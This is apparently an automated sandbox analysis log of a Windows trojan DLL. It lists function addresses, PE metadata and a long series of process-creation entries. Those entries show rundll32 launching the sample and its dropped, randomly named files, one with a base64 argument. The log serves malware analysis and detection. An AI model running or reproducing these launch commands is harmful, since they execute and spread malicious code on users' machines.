                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04455E02
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445C80A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04462414
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04457211
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04468A1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445FC25
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04461827
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445B637
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04454832
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445F2C7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445D6C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04462CD7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044558D6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044558DD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044574E8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445EAE8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04468E83
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0446A480
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04453083
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04462A8E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04456E8C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04466488
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04453A8A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04467A89
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04451695
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0446209C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044616A4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044606A8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04469AB7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044534B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04456B40
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445694C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04454351
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04468F5E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445E176
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445B171
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445E505
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445710C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445F710
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04458320
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04451130
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04451F30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04461D3D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044537C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044677CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044691C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044553D7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044577D3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044683ED
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04463DF4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04459BF6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445B3F9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04463984
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445CB83
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445A799
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445CFA3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044523AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445E7B7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445BFB6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04469FB3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370457F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FD77E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FED71
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03709B59
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F2B2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F7D07
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F83CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_037053C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FCDD8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03709C76
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F542D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F80E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FE2BE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03708684
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FBD6C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FF96A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F4F4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F7547
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F1D2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03702938
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FAB26
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F773B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FF100
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F8F1B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370030B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F69FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F13FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F17FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03708FE8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FBFF4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FA7F1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_037049EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03709DC4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_037083C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_037019CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F5FD2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F2FA7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F43BC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FF3B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FCBB1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370ABAE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F918D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FDB9E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FB394
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FEA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370B07B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03709A7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F5A60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F3C7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370066A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370346E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03704C55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F6248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FA05D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03700E49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03700820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03702422
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FC232
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F7E0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370961A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FD405
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F3A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370300F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FF6E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_037038D2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FFEC2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F64D8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370A6B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F40AB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_037012A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03702C97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F7A87
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F4685
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0370229F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03707083
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03703689
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F2290
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A9C76
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479542D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047980E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479E2BE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A457F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479D77E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479ED71
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04792B2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04797D07
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479CDD8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047983CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A53C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047AB07B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A9A7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04793C7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A066A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479EA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A346E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04795A60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479A05D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A4C55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04796248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A0E49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479C232
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A2422
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A0820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A961A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A300F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04797E0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04793A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479D405
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479F6E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047964D8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A38D2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479FEC2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047AA6B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047940AB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A12A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A229F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04792290
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A2C97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A3689
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A7083
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04794685
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04797A87
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A8684
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479F96A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479BD6C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A9B59
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04794F4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04797547
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479773B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A2938
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04791D2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479AB26
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04798F1B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A030B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479F100
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047913FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047917FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047969FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479A7F1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479BFF4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A8FE8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A49EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04795FD2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A19CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A83C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047A9DC4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047943BC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479CBB1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479F3B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_047AABAE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04792FA7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479DB9E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479B394
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0479918D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04614E65
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461DE6D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461FA6F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04622873
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0462907B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461564D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0462024E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461564C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0462405A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461945C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461FC25
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04621827
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04614832
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461B637
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04610C00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04615E02
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04612E05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461C80A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04617211
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04622414
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04628A1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_046174E8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461EAE8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461D6C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0461F2C7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04622CD7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_046158D6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_046158DD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F547F00 appears 51 times
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                    Source: pixmxoo.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pixmxoo.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pixmxoo.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pixmxoo.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: zGeK5so94c.dllStatic PE information: No import functions for PE file found
                    Source: zGeK5so94c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Source: zGeK5so94c.dllStatic PE information: Section: .data ZLIB complexity 1.0107421875
                    Source: classification engineClassification label: mal88.troj.evad.winDLL@61/8@0/3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F541CE0 Sleep,CreateToolhelp32Snapshot,GetLastError,Sleep,GetModuleFileNameW,PathFindFileNameW,Module32FirstW,Module32NextW,Module32NextW,FindCloseChangeNotification,Sleep,Module32NextW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,__ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ,std::ios_base::_Ios_base_dtor,
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7156:64:WilError_01
                    Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6FB.tmpJump to behavior
                    Source: zGeK5so94c.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL
                    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 240
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',dldZeiafGYsN
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\usib.lxs',#1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\pixmxoo.dll',#1 NAQAAB4AAABIAGIAagBwAGQAXAB1AHMAaQBiAC4AbAB4AHMAAAA=
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hlqxmsfzi\jjvjowsk.xoz',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdtgy\atyx.hvl',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cfwgvspim\fwvopxwu.wpy',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ibbigqfuoubc\tiynxefumvm.jsi',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aziiwkqaqp\dnweyyfur.lyr',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uchtpmhcpt\nfuoltapn.fge',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zvrxg\husq.avr',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jcoinynbga\etdgpznst.qoo',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfurjavtsbwkajdv\sfvtpwqlhvedlny.xdk',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Msjhyngbojq\bihctgwrjw.jsh',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mntpro\pwmgi.sow',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sioetxuvrihjyxu\wsarziebmecgqp.weo',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jvotvplywpzb\qwoawgsuzao.fmz',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofqhxlaxbkixqlny\iogmsr.ktr',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usfyyrevasc\hoztidaylv.ruq',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wzvizgyhx\mlhiyaxu.lik',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tthpthgifqmjjt\idvrfaaidqwxo.flr',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jdedkdp\loyrno.rpx',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmln\clyk.jxd',Control_RunDLL
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 240
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',dldZeiafGYsN
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\usib.lxs',#1
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\pixmxoo.dll',#1 NAQAAB4AAABIAGIAagBwAGQAXAB1AHMAaQBiAC4AbAB4AHMAAAA=
